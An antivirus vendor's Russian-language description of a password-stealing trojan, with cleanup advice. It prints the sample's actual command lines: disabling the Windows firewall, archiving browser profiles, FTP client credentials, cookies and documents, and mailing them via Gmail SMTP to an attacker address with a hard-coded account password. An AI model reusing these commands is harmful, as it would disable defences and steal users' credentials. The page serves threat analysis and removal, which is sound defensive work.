Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.PWS.Siggen.39666

Добавлен в вирусную базу Dr.Web: 2012-08-17

Описание добавлено:

Техническая информация

Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
Создает и запускает на исполнение:
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to redireserveur@gmail.com -subject FlashFXP -attachment "%TEMP%\fxp.zip" -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password LOdmfpf890
  • %WINDIR%\dllcache\csrss.exe -q -r -9 "%TEMP%\fox.zip" "%APPDATA%\Mozilla\Firefox\Profiles"
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to redireserveur@gmail.com -subject FileZilla -attachment "%TEMP%\fz.zip" -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password LOdmfpf890
  • %WINDIR%\dllcache\csrss.exe -q -9 "%TEMP%\fxp.zip" "%PROGRAM_FILES%\FlashFXP\*.dat" "%APPDATA%\FlashFXP\3\*.dat" "%ALLUSERSPROFILE%\Application Data\FlashFXP\3\*.dat"
  • %WINDIR%\dllcache\csrss.exe -q -r -9 "%TEMP%\backup.zip" "%TEMP%\backup"
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to redireserveur@gmail.com -subject Fichiers (txt, doc..) -attachment "%TEMP%\backup.zip" -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password LOdmfpf890
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to redireserveur@gmail.com -subject Firefox Profiles -attachment "%TEMP%\fox.zip" -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password LOdmfpf890
  • %WINDIR%\dllcache\robocopy.exe "%HOMEPATH%" "%TEMP%\backup" *.txt *.doc *.htm *.html *.php /MAX:2097152 /S /R:1 /W:1 /XJ /XD AppData Cookies "Application Data" "Local Settings"
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to redireserveur@gmail.com -subject Compte(s) MSN -attachment "%WINDIR%\dllcache\logsday.txt" -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password LOdmfpf890
  • %WINDIR%\dllcache\csrss.exe -q -j -9 "%TEMP%\xp_cookies.zip" "%HOMEPATH%\Cookies\*.txt"
  • %WINDIR%\dllcache\winlogon.exe "WooRec.exe - Composant introuvable" "Cette application n'a pas pu dйmarrer car MSVBVM50.DLL est introuvable. La rйinstallation de cette application peut corriger ce problиme." Ok x
  • %WINDIR%\dllcache\svchost.exe
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to redireserveur@gmail.com -subject Cookies IE (Vista) -attachment "%TEMP%\vista_cookies.zip" -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password LOdmfpf890
  • %WINDIR%\dllcache\csrss.exe -q -9 "%TEMP%\fz.zip" "%PROGRAM_FILES%\FileZilla\*.xml" "%APPDATA%\FileZilla\*.xml" -j "%TEMP%\fz.txt"
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe -from user_owned@gmail.com -to redireserveur@gmail.com -subject Cookies IE (XP) -attachment "%TEMP%\xp_cookies.zip" -server smtp.gmail.com:465 -ssl true -username server.smtp.server@gmail.com -password LOdmfpf890
  • %WINDIR%\dllcache\csrss.exe -q -j -9 "%TEMP%\vista_cookies.zip" "%APPDATA%\Microsoft\Windows\Cookies\*.txt"
Запускает на исполнение:
  • <SYSTEM32>\reg.exe export "HKEY_CURRENT_USER\Software\FileZilla\Recent Servers" "%TEMP%\fz.txt" /y
  • <SYSTEM32>\netsh.exe firewall set opmode disable
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами:
  • [<HKCU>\Software\Microsoft\MSNMessenger]
  • [<HKCU>\Software\Microsoft\MessengerService]
Изменения в файловой системе:
Создает следующие файлы:
  • <LS_APPDATA>\ApplicationHistory\ iexplore.exe.e2c06d0a.ini
  • %APPDATA%\Microsoft\CLR Security Config\v1.1.4322\security.config.new
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch.new
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\enterprisesec.config.cch.new
  • %APPDATA%\Microsoft\CLR Security Config\v1.1.4322\security.config.cch.new
  • %TEMP%\backup\Templates\winword2.doc
  • %TEMP%\zia03116
  • %TEMP%\zia03028
  • %TEMP%\backup\Templates\winword.doc
  • %WINDIR%\dllcache\winlogon.exe
  • %WINDIR%\dllcache\svchost.exe
  • %TEMP%\$inst\2.tmp
  • %TEMP%\$inst\temp_0.tmp
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe
  • %WINDIR%\dllcache\logsday.txt
  • %WINDIR%\dllcache\csrss.exe
  • %WINDIR%\dllcache\robocopy.exe
Удаляет следующие файлы:
  • %WINDIR%\dllcache\csrss.exe
  • %WINDIR%\dllcache\logsday.txt
  • %TEMP%\backup\Templates\winword.doc
  • %TEMP%\backup\Templates\winword2.doc
  • %WINDIR%\dllcache\winlogon.exe
  • %TEMP%\$inst\2.tmp
  • %WINDIR%\dllcache\robocopy.exe
  • %WINDIR%\dllcache\svchost.exe
  • %TEMP%\fox.zip
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch.2624.163640
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\enterprisesec.config.cch.2624.163656
  • %TEMP%\$inst\temp_0.tmp
  • %TEMP%\~DFFE22.tmp
  • %PROGRAM_FILES%\Internet Explorer\ iexplore.exe
  • %TEMP%\backup.zip
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch.2704.172312
  • %APPDATA%\Microsoft\CLR Security Config\v1.1.4322\security.config.cch.2780.180078
Перемещает следующие системные файлы:
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\enterprisesec.config.cch в %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\enterprisesec.config.cch.2624.163656
  • %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch в %WINDIR%\Microsoft.NET\Framework\v1.1.4322\CONFIG\security.config.cch.2624.163640
Сетевая активность:
Подключается к:
  • 'sm##.gmail.com':465
UDP:
  • DNS ASK sm##.gmail.com
Другое:
Ищет следующие окна:
  • ClassName: '' WindowName: '%WINDIR%\dllcache\winlogon.exe'
  • ClassName: 'Shell_TrayWnd' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке